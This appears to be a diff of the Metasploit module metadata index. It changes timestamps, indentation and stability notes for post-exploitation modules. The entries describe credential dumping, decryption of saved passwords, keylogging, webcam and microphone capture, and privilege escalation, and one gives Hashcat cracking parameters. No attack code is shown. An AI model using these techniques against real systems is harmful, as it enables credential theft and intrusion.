    "path": "/modules/post/osx/gather/safari_lastsession.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/safari_lastsession",
@@ -211569,7 +214059,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/vnc_password_osx.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/vnc_password_osx",
@@ -211607,7 +214097,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/manage/mount_share.rb",
    "is_install_path": true,
    "ref_name": "osx/manage/mount_share",
@@ -211644,7 +214134,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/manage/record_mic.rb",
    "is_install_path": true,
    "ref_name": "osx/manage/record_mic",
@@ -211671,7 +214161,7 @@
      "Sam Aaron",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module controls Sonic Pi via its local OSC server.\n\n        The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n        Yes, this is RCE, but it's local. I suggest playing music. :-)",
+    "description": "This module controls Sonic Pi via its local OSC server.\n\n          The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n          Yes, this is RCE, but it's local. I suggest playing music. :-)",
    "references": [
      "URL-https://sonic-pi.net/",
      "URL-https://github.com/samaaron/sonic-pi/wiki/Sonic-Pi-Internals----GUI-Ruby-API",
@@ -211683,7 +214173,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/manage/sonic_pi.rb",
    "is_install_path": true,
    "ref_name": "osx/manage/sonic_pi",
@@ -211724,7 +214214,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/manage/vpn.rb",
    "is_install_path": true,
    "ref_name": "osx/manage/vpn",
@@ -211761,7 +214251,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/manage/webcam.rb",
    "is_install_path": true,
    "ref_name": "osx/manage/webcam",
@@ -211799,7 +214289,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-01 22:58:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/solaris/escalate/pfexec.rb",
    "is_install_path": true,
    "ref_name": "solaris/escalate/pfexec",
@@ -211826,7 +214316,7 @@
      "h00die",
      "iDefense"
    ],
-    "description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n                               When srsexec is executed in debug (-d) verbose (-v) mode,\n                               the first line of an arbitrary file can be read due to the suid bit set.\n                               The most widely accepted exploitation vector is reading /etc/shadow,\n                               which will reveal root's hash for cracking.",
+    "description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n          When srsexec is executed in debug (-d) verbose (-v) mode,\n          the first line of an arbitrary file can be read due to the suid bit set.\n          The most widely accepted exploitation vector is reading /etc/shadow,\n          which will reveal root's hash for cracking.",
    "references": [
      "CVE-2007-2617",
      "URL-https://download.oracle.com/sunalerts/1000443.1.html",
@@ -211840,7 +214330,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/solaris/escalate/srsexec_readline.rb",
    "is_install_path": true,
    "ref_name": "solaris/escalate/srsexec_readline",
@@ -211877,7 +214367,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/solaris/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "solaris/gather/checkvm",
@@ -211903,7 +214393,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "Post Module to enumerate installed packages on a Solaris System",
+    "description": "Post module to enumerate installed packages on a Solaris System",
    "references": [

    ],
@@ -211913,7 +214403,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 14:12:25 +0000",
    "path": "/modules/post/solaris/gather/enum_packages.rb",
    "is_install_path": true,
    "ref_name": "solaris/gather/enum_packages",
@@ -211939,7 +214429,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "Post Module to enumerate services on a Solaris System",
+    "description": "Post module to enumerate services on a Solaris System",
    "references": [

    ],
@@ -211949,7 +214439,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 14:12:25 +0000",
    "path": "/modules/post/solaris/gather/enum_services.rb",
    "is_install_path": true,
    "ref_name": "solaris/gather/enum_services",
@@ -211975,7 +214465,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "Post Module to dump the password hashes for all users on a Solaris System",
+    "description": "Post module to dump the password hashes for all users on a Solaris System",
    "references": [

    ],
@@ -211985,7 +214475,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-13 10:13:27 +0000",
+    "mod_time": "2023-02-08 14:12:25 +0000",
    "path": "/modules/post/solaris/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "solaris/gather/hashdump",
@@ -212022,7 +214512,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 14:12:25 +0000",
    "path": "/modules/post/windows/capture/keylog_recorder.rb",
    "is_install_path": true,
    "ref_name": "windows/capture/keylog_recorder",
@@ -212059,7 +214549,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/capture/lockout_keylogger.rb",
    "is_install_path": true,
    "ref_name": "windows/capture/lockout_keylogger",
@@ -212095,7 +214585,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/escalate/droplnk.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/droplnk",
@@ -212131,7 +214621,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-16 14:53:45 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/escalate/getsystem.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/getsystem",
@@ -212175,7 +214665,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/escalate/golden_ticket.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/golden_ticket",
@@ -212216,7 +214706,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/ms10_073_kbdlayout",
@@ -212253,7 +214743,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/escalate/screen_unlock.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/screen_unlock",
@@ -212295,7 +214785,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/unmarshal_cmd_exec",
@@ -212321,7 +214811,7 @@
    "author": [
      "Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
    ],
-    "description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n        and write this to a SQLite database for offline analysis and query using normal SQL syntax.",
+    "description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n          and write this to a SQLite database for offline analysis and query using normal SQL syntax.",
    "references": [

    ],
@@ -212331,7 +214821,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-05 13:08:46 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/ad_to_sqlite.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/ad_to_sqlite",
@@ -212367,7 +214857,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/arp_scanner.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/arp_scanner",
@@ -212403,7 +214893,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-05-13 04:01:03 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/gather/avast_memory_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/avast_memory_dump",
@@ -212411,6 +214901,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -212440,7 +214940,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/bitcoin_jacker.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bitcoin_jacker",
@@ -212477,7 +214977,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-23 17:41:20 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/bitlocker_fvek.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bitlocker_fvek",
@@ -212563,7 +215063,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/cachedump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/cachedump",
@@ -212695,7 +215195,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/avira_password.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/avira_password",
@@ -212731,7 +215231,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/bulletproof_ftp",
@@ -212901,7 +215401,7 @@
    "author": [
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
-    "description": "This module extracts saved passwords from the CoreFTP FTP client. These\n      passwords are stored in the registry. They are encrypted with AES-128-ECB.\n      This module extracts and decrypts these passwords.",
+    "description": "This module extracts saved passwords from the CoreFTP FTP client. These\n          passwords are stored in the registry. They are encrypted with AES-128-ECB.\n          This module extracts and decrypts these passwords.",
    "references": [

    ],
@@ -212911,7 +215411,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-19 20:35:33 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/coreftp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/coreftp",
@@ -212947,7 +215447,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/credential_collector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/credential_collector",
@@ -213031,7 +215531,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-23 17:41:20 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/domain_hashdump",
@@ -213057,7 +215557,7 @@
    "author": [
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module extracts clear text credentials from dynazip.log.\n        The log file contains passwords used to encrypt compressed zip\n        files in Microsoft Plus! 98 and Windows Me.",
+    "description": "This module extracts clear text credentials from dynazip.log.\n          The log file contains passwords used to encrypt compressed zip\n          files in Microsoft Plus! 98 and Windows Me.",
    "references": [
      "CVE-2001-0152",
      "MSB-MS01-019",
@@ -213070,7 +215570,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/dynazip_log.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/dynazip_log",
@@ -213108,7 +215608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/dyndns.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/dyndns",
@@ -213144,7 +215644,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_cred_store",
@@ -213180,7 +215680,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_laps.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_laps",
@@ -213217,7 +215717,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_picasa_pwds",
@@ -213253,7 +215753,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/epo_sql.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/epo_sql",
@@ -213290,7 +215790,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/filezilla_server.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/filezilla_server",
@@ -213326,7 +215826,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/flashfxp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/flashfxp",
@@ -213410,7 +215910,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/ftpnavigator.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/ftpnavigator",
@@ -213446,7 +215946,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/ftpx.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/ftpx",
@@ -213538,7 +216038,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-23 17:41:20 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/gpp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/gpp",
@@ -213564,7 +216064,7 @@
    "author": [
      "h0ng10"
    ],
-    "description": "This module extracts saved passwords from the HeidiSQL client. These\n      passwords are stored in the registry. They are encrypted with a custom algorithm.\n      This module extracts and decrypts these passwords.",
+    "description": "This module extracts saved passwords from the HeidiSQL client. These\n          passwords are stored in the registry. They are encrypted with a custom algorithm.\n          This module extracts and decrypts these passwords.",
    "references": [

    ],
@@ -213574,7 +216074,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/heidisql.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/heidisql",
@@ -213649,7 +216149,7 @@
      "sil3ntdre4m <sil3ntdre4m@gmail.com>",
      "Unknown"
    ],
-    "description": "This module recovers the saved premium download account passwords from\n        Internet Download Manager (IDM). These passwords are stored in an encoded\n        format in the registry. This module traverses through these registry entries\n        and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n        password module.",
+    "description": "This module recovers the saved premium download account passwords from\n          Internet Download Manager (IDM). These passwords are stored in an encoded\n          format in the registry. This module traverses through these registry entries\n          and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n          password module.",
    "references": [

    ],
@@ -213659,7 +216159,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/idm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/idm",
@@ -213733,7 +216233,7 @@
    "author": [
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module will collect iMail user data such as the username, domain,\n        full name, e-mail, and the decoded password.  Please note if IMAILUSER is\n        specified, the module extracts user data from all the domains found.  If\n        IMAILDOMAIN is specified, then it will extract all user data under that\n        particular category.",
+    "description": "This module will collect iMail user data such as the username, domain,\n          full name, e-mail, and the decoded password.  Please note if IMAILUSER is\n          specified, the module extracts user data from all the domains found.  If\n          IMAILDOMAIN is specified, then it will extract all user data under that\n          particular category.",
    "references": [
      "EDB-11331"
    ],
@@ -213743,7 +216243,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/imail.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/imail",
@@ -213769,7 +216269,7 @@
    "author": [
      "Shubham Dawra <shubham2dawra@gmail.com>"
    ],
-    "description": "This module extracts account username & password from the IMVU game client\n        and stores it as loot.",
+    "description": "This module extracts account username & password from the IMVU game client\n          and stores it as loot.",
    "references": [

    ],
@@ -213779,7 +216279,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/imvu.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/imvu",
@@ -214046,7 +216546,7 @@
      "Mike Manzotti <mike.manzotti@dionach.com>",
      "Maurizio inode Agazzini"
    ],
-    "description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n        used to lock down the user interface. Hashcat supports cracking this type of\n        hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n        (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n        format is available for John the Ripper at the referenced URL.",
+    "description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n          used to lock down the user interface. Hashcat supports cracking this type of\n          hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n          (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). A dynamic\n          format is available for John the Ripper at the referenced URL.",
    "references": [
      "URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning"
    ],
@@ -214056,7 +216556,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/mcafee_vse_hashdump",
@@ -214092,7 +216592,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/mdaemon_cred_collector",
@@ -214129,7 +216629,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/meebo.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/meebo",
@@ -214250,7 +216750,7 @@
      "hdm <x@hdm.io>",
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module extracts saved passwords from mRemote. mRemote stores\n            connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n            the passwords in an encrypted format. The module will extract the connection\n            info and decrypt the saved passwords.",
+    "description": "This module extracts saved passwords from mRemote. mRemote stores\n          connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n          the passwords in an encrypted format. The module will extract the connection\n          info and decrypt the saved passwords.",
    "references": [

    ],
@@ -214260,7 +216760,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/mremote.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/mremote",
@@ -214297,7 +216797,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/mssql_local_hashdump",
@@ -214372,7 +216872,7 @@
      "sil3ntdre4m <sil3ntdre4m@gmail.com>",
      "Unknown"
    ],
-    "description": "This module extracts the account passwords saved by Nimbuzz Instant\n        Messenger in hex format.",
+    "description": "This module extracts the account passwords saved by Nimbuzz Instant\n          Messenger in hex format.",
    "references": [

    ],
@@ -214382,7 +216882,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/nimbuzz.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/nimbuzz",
@@ -214514,7 +217014,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/outlook.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/outlook",
@@ -214601,7 +217101,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/gather/credentials/pulse_secure.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/pulse_secure",
@@ -214609,6 +217109,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -214638,7 +217147,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/purevpn_cred_collector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/purevpn_cred_collector",
@@ -214725,7 +217234,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/razer_synapse.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/razer_synapse",
@@ -214762,7 +217271,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/razorsql.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/razorsql",
@@ -214798,7 +217307,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/rdc_manager_creds",
@@ -214976,7 +217485,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/securecrt.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/securecrt",
@@ -215024,7 +217533,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/skype.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/skype",
@@ -215052,7 +217561,7 @@
      "bcoles <bcoles@gmail.com>",
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module extracts and decrypts the sysadmin password in the\n        SmarterMail 'mailConfig.xml' configuration file. The encryption\n        key and IV are publicly known.\n\n        This module has been tested successfully on SmarterMail versions\n        10.7.4842 and 11.7.5136.",
+    "description": "This module extracts and decrypts the sysadmin password in the\n          SmarterMail 'mailConfig.xml' configuration file. The encryption\n          key and IV are publicly known.\n\n          This module has been tested successfully on SmarterMail versions\n          10.7.4842 and 11.7.5136.",
    "references": [
      "URL-http://www.gironsec.com/blog/tag/cracking-smartermail/"
    ],
@@ -215062,7 +217571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-19 20:35:33 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/smartermail.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/smartermail",
@@ -215099,7 +217608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/smartftp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/smartftp",
@@ -215183,7 +217692,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/gather/credentials/spark_im.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/spark_im",
@@ -215267,7 +217776,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
